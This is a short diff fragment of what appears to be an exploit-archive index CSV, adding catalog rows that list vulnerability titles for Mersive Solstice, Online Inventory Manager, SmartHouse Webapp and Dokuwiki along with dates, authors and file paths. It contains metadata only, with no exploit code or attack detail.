 47722,exploits/android/webapps/47722.py,"Mersive Solstice 2.8.0 - Remote Code Execution",2019-11-28,"Alexandre Teyar",webapps,android,
 47725,exploits/php/webapps/47725.txt,"Online Inventory Manager 3.2 - Persistent Cross-Site Scripting",2019-11-29,"Cemal Cihad ÇİFTÇİ",webapps,php,
+47730,exploits/php/webapps/47730.txt,"SmartHouse Webapp 6.5.33 - Cross-Site Request Forgery",2019-12-02,LiquidWorm,webapps,php,
+47731,exploits/php/webapps/47731.txt,"Dokuwiki 2018-04-22b - Username Enumeration",2019-12-02,"Talha ŞEN",webapps,php,